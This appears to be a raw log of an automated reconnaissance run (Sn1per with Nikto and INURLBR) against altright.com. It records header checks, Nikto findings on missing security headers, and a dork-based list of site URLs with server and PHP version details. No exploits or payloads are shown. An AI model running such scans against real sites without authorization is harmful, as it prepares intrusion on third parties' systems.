- HTTP/1.1 405 Not Allowed
- Date: Thu, 28 Sep 2017 08:53:30 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- Server: -nginx
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- HTTP/1.1 301 Moved Permanently
- Date: Thu, 28 Sep 2017 08:53:31 GMT
- Transfer-Encoding: chunked
- Connection: keep-alive
- Cache-Control: max-age=3600
- Expires: Thu, 28 Sep 2017 09:53:31 GMT
- Location: https://altright.com/
- Server: cloudflare-nginx
- CF-RAY: 3a557906f3266908-CDG
- 0
- + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
- + -- --=[Checking if X-Content options are enabled on altright.com...
- + -- --=[Checking if X-Frame options are enabled on altright.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on altright.com...
- + -- --=[Checking HTTP methods on altright.com...
- + -- --=[Checking if TRACE method is enabled on altright.com...
- + -- --=[Checking for META tags on altright.com...
- + -- --=[Checking for open proxy on altright.com...
- </div><!-- /#cf-wrapper -->
- <script type="text/javascript">
- window._cf_translation = {};
- </script>
- </body>
- </html>
- + -- --=[Enumerating software on altright.com...
- Server: cloudflare-nginx
- + -- --=[Checking if Strict-Transport-Security is enabled on altright.com...
- + -- --=[Checking for Flash cross-domain policy on altright.com...
- + -- --=[Checking for Silverlight cross-domain policy on altright.com...
- + -- --=[Checking for HTML5 cross-origin resource sharing on altright.com...
- + -- --=[Retrieving robots.txt on altright.com...
- + -- --=[Retrieving sitemap.xml on altright.com...
- + -- --=[Checking cookie attributes on altright.com...
- + -- --=[Checking for ASP.NET Detailed Errors on altright.com...
- .kid-author-box .author-info .kid-author-page-contact a:hover, .error-number h1, #kid-404-wrap .kid-error-title,
- <body class="error404">
- <img src="https://altright.com/wp-content/themes/sterling-child/img/altright-logo.svg" alt="AltRight.com" width="430" height="45" alt="AltRight.com" onerror="this.removeAttribute('onerror'); this.src='https://altright.com/wp-content/themes/sterling-child/img/altright-logo.png'" />
- <div class="error-number">
- <h4 class="kid-error-title">Page not found</h4>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.178.91
- + Target Hostname: altright.com
- + Target Port: 80
- + Start Time: 2017-09-28 04:53:34 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3a55791de5806944-CDG
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
- + 26097 requests: 0 error(s) and 3 item(s) reported on remote host
- + End Time: 2017-09-28 07:57:34 (GMT-4) (11040 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/altright.com-port80.jpg
- + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
- + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
- _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
- (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
- (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
- \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
- \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
- /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
- [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
- __[ ! ] Neither war between hackers, nor peace for the system.
- __[ ! ] http://blog.inurl.com.br
- __[ ! ] http://fb.com/InurlBrasil
- __[ ! ] http://twitter.com/@googleinurl
- __[ ! ] http://github.com/googleinurl
- __[ ! ] Current PHP version::[ 7.0.22-3 ]
- __[ ! ] Current script owner::[ root ]
- __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
- __[ ! ] Current pwd::[ /usr/share/sniper ]
- __[ ! ] Help: php inurlbr.php --help
- ------------------------------------------------------------------------------------------------------------------------
- [ ! ] Starting SCANNER INURLBR 2.1 at [28-09-2017 07:58:20]
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-altright.com.txt ]
- [ INFO ][ DORK ]::[ site:altright.com ]
- [ INFO ][ SEARCHING ]:: {
- [ INFO ][ ENGINE ]::[ GOOGLE - www.google.im ]
- [ INFO ][ SEARCHING ]::
- -[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE API ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.nr ID: 007843865286850066037:b0heuatvay8 ]
- [ INFO ][ SEARCHING ]::
- -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
- [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 0 / 100 ]-[07:58:32] [ - ]
- |_[ + ] Target:: [ https://altright.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 1 / 100 ]-[07:58:33] [ - ]
- |_[ + ] Target:: [ https://altright.com/donate/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 2 / 100 ]-[07:58:34] [ - ]
- |_[ + ] Target:: [ https://altright.com/submissions/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 3 / 100 ]-[07:58:35] [ - ]
- |_[ + ] Target:: [ https://altright.com/account/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 4 / 100 ]-[07:58:36] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 5 / 100 ]-[07:58:38] [ - ]
- |_[ + ] Target:: [ https://altright.com/chat/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 6 / 100 ]-[07:58:39] [ - ]
- |_[ + ] Target:: [ https://altright.com/contact/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 7 / 100 ]-[07:58:40] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/kristofferhugin/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 8 / 100 ]-[07:58:42] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/2017/06/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 9 / 100 ]-[07:58:44] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/2017/05/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 10 / 100 ]-[07:58:45] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/om-oss/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 11 / 100 ]-[07:58:46] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/robertr/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 12 / 100 ]-[07:58:47] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/category/kultur/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 13 / 100 ]-[07:58:48] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/2017/08/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 14 / 100 ]-[07:58:49] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/metapolitisk-ordlista/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 15 / 100 ]-[07:58:51] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/category/vetenskap/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 16 / 100 ]-[07:58:52] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/category/perspektiv/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 17 / 100 ]-[07:58:54] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/2017/09/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 18 / 100 ]-[07:58:55] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/2017/07/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 19 / 100 ]-[07:58:56] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/althogern/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 20 / 100 ]-[07:58:57] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/category/media/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 21 / 100 ]-[07:58:58] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/ras/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 22 / 100 ]-[07:59:00] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/jonasnilsson/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 23 / 100 ]-[07:59:01] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/magnussoderman/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 24 / 100 ]-[07:59:02] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/nationalism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 25 / 100 ]-[07:59:03] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/mannenm/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 26 / 100 ]-[07:59:05] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/terrorism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 27 / 100 ]-[07:59:06] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/djurratt/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 28 / 100 ]-[07:59:07] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/expo/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 29 / 100 ]-[07:59:08] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/antons/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 30 / 100 ]-[07:59:09] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/kulturelit/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 31 / 100 ]-[07:59:10] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/kulturhuset/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 32 / 100 ]-[07:59:12] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/charlottesville/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 33 / 100 ]-[07:59:13] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/ensamkommande/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 34 / 100 ]-[07:59:14] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/yugobay/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 35 / 100 ]-[07:59:14] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/jagarhar/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 36 / 100 ]-[07:59:16] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/altruism/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 37 / 100 ]-[07:59:17] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/simonjester/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 38 / 100 ]-[07:59:18] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/batikhaxor/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 39 / 100 ]-[07:59:20] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/kurder/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 40 / 100 ]-[07:59:21] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/category/nyheter/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 41 / 100 ]-[07:59:22] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/narrativ/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 42 / 100 ]-[07:59:24] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/author/gustavhorngren/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 43 / 100 ]-[07:59:25] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/kyrkoval/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 44 / 100 ]-[07:59:26] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/dn/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 45 / 100 ]-[07:59:27] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/podcast/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 46 / 100 ]-[07:59:28] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/intersektionell/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 47 / 100 ]-[07:59:29] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/nationaldagen/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 48 / 100 ]-[07:59:30] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/lamotteokrati/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 49 / 100 ]-[07:59:32] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/blatteskatt/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 50 / 100 ]-[07:59:33] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/krankt/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 51 / 100 ]-[07:59:34] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/soundcloud/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 52 / 100 ]-[07:59:35] [ - ]
- |_[ + ] Target:: [ https://nordic.altright.com/tag/rattvisekrigare/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
- |_[ + ] More details::
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
